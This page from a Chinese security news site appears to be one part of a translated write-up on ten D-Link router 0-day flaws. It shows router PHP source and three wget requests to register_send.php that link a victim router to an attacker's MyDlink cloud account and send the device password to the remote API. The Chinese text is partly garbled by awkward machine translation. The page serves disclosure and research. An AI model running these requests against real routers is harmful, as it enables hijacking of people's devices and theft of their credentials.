欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

D-link十个漏洞0Day研究(附上详细过程)

来源:本站整理 作者:佚名 时间:2017-09-13 TAG: 我要投稿
182
183 $post_url_signup = "/signin/";
184
185 $action_signup = "signup";
186
187 //sign in      
188 $post_str_signin = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
189             "&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"]." ";
190
191 $post_url_signin = "/account/?signin";
192
193 $action_signin = "signin";
194
195 //add dev (bind device)
196 $post_str_adddev = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
197             "&dlife_no=" .$mydlink_num. "&device_password=" .$devpasswd. "&dfp=" .$dlinkfootprint." ";
198
199 $post_url_adddev = "/account/?add";
200
201 $action_adddev = "adddev";
202
203 //main start
204 if($action == $action_signup)                    205 {
206         $post_str = $post_str_signup;
207         $post_url = $post_url_signup;
208         $withcookie = "";   //signup dont need cookie info
209 }
210 else if($action == $action_signin)               211 {
212         $post_str = $post_str_signin;
213         $post_url = $post_url_signin;
214         $withcookie = "\r\nCookie:; mydlink=pr2c11jl60i21v9t5go2fvcve2;";
215 }
216 else if($action == $action_adddev)               3rd request
217 {
218         $post_str = $post_str_adddev;
219         $post_url = $post_url_adddev;
220 }
向路由器发送3个HTTP哀求来应用该破绽漏洞bug:
第一个哀求 (signup)会在MyDlink办事上创立一个用户:
user@kali:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=signup&lang=en&outemail=MYEMAIL@GMAIL.COM&passwd=SUPER_PASSWORD&firstname=xxxxxxxx&lastname=xxxxxxxx' http://ip/register_send.php
register_send>
   result>successresult>
   url>http://mp-us-portal.auto.mydlink.comurl>
register_send>
该哀求被发送给MyDlink Cloud APIs:
179 $post_str_signup = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
180                    "&action=sign-up&accept=accept&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"].
181                    "&password_verify=" .$_POST["passwd"]. "&name_first=" .$_POST["firstname"]. "&name_last=" .$_POST["lastname"]." ";
第二个哀求 (signin)路由器会将该账户与新创立的用户相干联,但不激活:
user@kali:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=signin&lang=en&outemail=MYEMAIL@GMAIL.COM&passwd=SUPER_PASSWORD&firstname=xxxxxxxx&lastname=xxxxxxxx' http://ip/register_send.php
register_send>
  result>successresult>
  url>http://mp-us-portal.auto.mydlink.comurl>
register_send>
该哀求被发送给 MyDlink Cloud APIs:
188 $post_str_signin = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
189             "&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"]." ";
第三个哀求是把装备和dlink办事相治理,并发送装备口令给长途API。
user@kali:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=adddev&lang=en' http://ip/register_send.php
register_send>
  result>successresult>
  url>http://mp-us-portal.auto.mydlink.comurl>
register_send>
该哀求被发送给 MyDlink Cloud APIs:
196 $post_str_adddev = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
197             "&dlife_no=" .$mydlink_num. "&device_password=" .$devpasswd. "&dfp=" .$dlinkfootprint." ";

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载